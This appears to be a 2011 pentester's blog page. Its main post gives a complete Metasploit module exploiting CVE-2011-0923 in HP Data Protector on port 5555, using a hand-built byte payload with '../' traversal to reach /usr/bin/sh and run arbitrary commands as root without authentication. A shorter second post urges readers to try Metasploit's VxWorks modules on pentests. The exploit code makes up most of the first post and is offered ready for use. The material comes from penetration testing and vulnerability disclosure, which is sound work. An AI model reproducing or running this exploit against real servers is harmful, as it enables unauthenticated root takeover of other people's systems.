c4an dll: Exploitation

This is a quick post on a vuln we (ch0ks and I)identified and exploit in a HP-UX during a pentest. The vuln had been already reported on the ZDI site and had a working PoC on security focus. The thing is though, that the working exploit only worked for Windows servers and workstations. After some time of analysis by ch0ks and me during the pentest we figure out a way to execute commands on the HP-UX server with a modified version of the payload included in the PoC. The full explanation of how we did this can be found in Adrian's Puente (ch0ks) blog hackarandas.

The metasploit module that I developed using this analysis has been already submitted to the team and hopefully they will included in it. Just to show you guys that I am not full of it I included some screenshots of the execution of the module.

Module options:

Example of the working exploit runnng a simple command on the HP-UX (/usr/bin/id):

gr33tz to ch0ks, etlow.

c4an.

Exploit code:

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
    Rank = ExcellentRanking

    include Msf::Exploit::Remote::Tcp

    def initialize(info = {})
        super(update_info(info,
            'Name'           => 'HP Data Protector Remote Command Execution',
            'Description'    => %q{
                    This exploit abuses a vulnerability in the HP Data
                Protector service. This flaw allows an unauthenticated
                attacker to execute arbitrary commands with the privileges
                of the root user.
            },
            'Author'         => [ 'c4an', 'ch0ks'],
            'Version'        => '$Revision: 10561 $',
            'References'     =>
                [
                    [ 'CVE', '2011-0923'],
                    [ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-11-055/'],
                    [ 'URL', 'http://c4an-dl.blogspot.com/hp-data-protector-vuln.html'],
                    [ 'URL', 'http://hackarandas.com/blog/2011/08/04/hp-data-protector-remote-shell-for-hpux']

                ],
            'Platform'       => [ 'unix','linux'],
            'Arch'           => ARCH_CMD,

            'Payload'        =>
                {
                    'Space'       =>10000,
                    'DisableNops' => true,
                    'Compat'      =>
                        {
                            'PayloadType' => 'cmd',
                            'RequiredCmd' => 'generic',
                        }
                },
            'Targets'        =>
                [
                    [ 'Automatic Target', {}]
                ],
            'DefaultTarget' => 0,

            'DisclosureDate' => 'June 26 2011'
        ))

        register_options(
            [
                Opt::RPORT(5555),
            ], self.class)
    end

    def exploit
        print_status("Sending our commmand...")
        # Send the job request with the encoded command

        shell_mio = "usr/bin/sh"
        salto = "\n"
        s = salto.encode

        shellcode = "\x00\x00\x00\xa4\x20\x32\x00\x20\x63\x34\x61\x6e\x63\x34\x61\x6e" +
            "\x00\x20\x30\x00\x20\x53\x59\x53\x54\x45\x4d\x00\x20\x63\x34\x61\x6e" +
            "\x20\x20\x20\x20\x20\x00\x20\x43\x00\x20\x32\x30\x00\x20\x63\x34" +
            "\x61\x6e\x20\x20\x20\x20\x00\x20\x50\x6f\x63\x00\x20\x4e\x54\x41" +
            "\x55\x54\x48\x4f\x52\x49\x54\x59\x00\x20\x4e\x54\x41\x55\x54\x48" +
            "\x4f\x52\x49\x54\x59\x00\x20\x4e\x54\x41\x55\x54\x48\x4f\x52\x49" +
            "\x54\x59\x00\x20\x30\x00\x20\x30\x00\x20\x2e\x2e\x2f\x2e\x2e\x2f" +
            "\x2e\x2e\x2f\x2e\x2e\x2f\x2e\x2e\x2f\x2e\x2e\x2f\x2e\x2e\x2f\x2e" +
            "\x2e\x2f\x2e\x2e\x2f\x2e\x2e\x2f"
        shell =     shell_mio +
                    "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +
                    "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +
                    "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +
                    payload.encode + s

        sploit = shellcode + shell

        begin
            connect
            sock.put(sploit)
            res = sock.get
            print_status(res.to_s)
            handler
        rescue
            print_status("Error in connection or socket")
        end
    end
end

I am not sure why I forgot to publish a comments about this before. Probably because I was busy with other things at the time. Anyways, as a lot of you guys already might know, HD Moore gave a presentation on Defcon about VXworks operating system and some security vulnerabilities that he identified during his investigation over a number of devices that use this operating system. A lot of the details have already been published by HD in the metasploit blog. However, I would like to add, people if you have not tested or use these modules on your pentests I will just say: DO IT!!

I remember one of the things that HD Moore mentioned starting his presentation at Defcon was: "Have you ever seen some high weired ports on your pentests and just because you did not know what the service was about you will move to the next service, well.."... I mean it was something like that. Well I remember having at least two pentests where I saw some of these VXworks ports and did not pay a lot of attention after playing with them a little bit. Shame on me... the UDP port 17185 does not ring a bell but after you read the info in the metasploit blog it will.

Well, I just wanted to throw this out there and since all the info is already posted out I will not waste your time anymore.

Happy hacking.

c4an.

c4an dll

Follow me on:

Thursday, August 4, 2011

HP Data Protector vuln

Monday, November 15, 2010

VXworks - Open can of worms...

Monday, January 25, 2010

Exploit writing tutorial! (link to a great blog)